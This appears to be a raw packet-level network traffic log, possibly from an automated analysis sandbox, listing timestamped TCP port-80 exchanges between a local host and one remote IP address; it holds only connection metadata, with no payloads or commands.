Oct 14, 2024 01:53:19.547130108 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547159910 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547211885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547221899 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547229052 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547236919 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547245979 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547256947 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547259092 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547285080 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547292948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547297001 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547306061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547324896 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547327042 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547337055 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547344923 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547353983 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547362089 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547364950 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547369957 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547411919 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547419071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547437906 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547446966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547451973 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547461033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547468901 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547475100 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547499895 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547508001 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547508955 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547537088 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547549963 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547550917 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547561884 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547570944 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547579050 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547584057 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547602892 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547611952 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547614098 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547621012 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547627926 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547636986 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547645092 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547656059 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547656059 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547679901 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547683001 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547691107 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547698975 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547708035 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547709942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547741890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547774076 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547777891 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547787905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547796011 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547804117 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547812939 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547821999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547827959 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547862053 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547863007 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547873020 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547882080 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.547897100 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.547931910 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.548053026 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548063040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548072100 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548099995 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.548126936 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.548137903 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548147917 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548156023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548170090 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548177958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548180103 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.548187017 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548197031 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.548228979 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.548247099 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.587342978 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.587354898 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.587363958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.587445974 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.588146925 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.588169098 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.588176966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.588218927 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.588244915 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.588324070 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.588344097 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.588351965 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.588372946 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.588406086 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589112997 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589152098 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589159966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589163065 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589200020 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589407921 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589427948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589437962 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589458942 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589481115 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589490891 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589493036 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589531898 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589566946 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589591026 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589601040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589608908 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589618921 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589618921 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589628935 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589641094 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589658022 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589674950 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589684963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589692116 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589693069 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589701891 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589711905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589720011 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589723110 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589766026 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589770079 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589780092 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589788914 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589807034 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589814901 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589822054 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589831114 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589837074 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589854002 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589863062 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589871883 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589876890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589881897 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.589909077 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.589929104 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.590073109 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590082884 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590092897 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590116024 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590117931 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.590126038 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590136051 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590142965 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.590145111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590154886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590162992 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590169907 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.590173006 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590183020 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590192080 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.590208054 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.590231895 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838359118 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838390112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838398933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838408947 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838423967 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838444948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838443995 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838454008 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838464022 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838474035 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838484049 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838493109 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838501930 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838510990 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838519096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838517904 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838519096 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838532925 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838543892 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838557959 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838562012 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838562012 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838587046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838588953 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838597059 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838608027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838610888 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838618040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838628054 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838635921 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838644981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838649988 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838658094 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838664055 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838666916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838676929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838686943 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838716030 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838731050 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838733912 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838742018 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838749886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838757992 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838767052 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838773012 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838776112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838787079 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838798046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838819027 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838819981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838835955 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838845968 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838845968 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838855028 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838865042 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838866949 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838874102 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838884115 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838892937 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.838924885 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.838948965 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839112043 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839123011 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839144945 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839154959 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839160919 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839163065 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839174032 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839183092 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839217901 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839217901 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839257956 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839289904 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839301109 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839310884 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839334965 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839344025 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839345932 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839354038 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839364052 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839373112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839381933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839406967 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839406967 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839420080 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839427948 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839430094 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839445114 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839458942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839468002 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839468956 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839482069 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839502096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839507103 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839512110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839529991 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839529991 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839539051 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839549065 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839562893 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839598894 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839602947 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839648962 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839673996 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839684963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839693069 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839700937 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839709997 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839720964 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839725018 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839735985 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839759111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839767933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839776993 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839786053 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839795113 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839796066 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839807034 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839816093 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839818954 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839828014 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839848995 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839859009 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839869976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839869976 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839879036 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839889050 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839899063 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839907885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839917898 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839925051 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839926958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839940071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839951992 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839962959 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839975119 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.839981079 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839981079 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.839987993 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840003014 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840024948 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840053082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840219975 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840231895 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840240955 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840250969 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840260983 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840270996 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840281963 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840321064 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840372086 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840384007 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840394020 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840403080 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840413094 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840420008 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840424061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840435028 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840445995 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840456963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840459108 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840471029 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840493917 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840502977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840514898 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840516090 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.840527058 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840538025 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840548038 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840558052 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840569019 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.840572119 CEST	49705	80	192.168.2.5	185.215.113.37
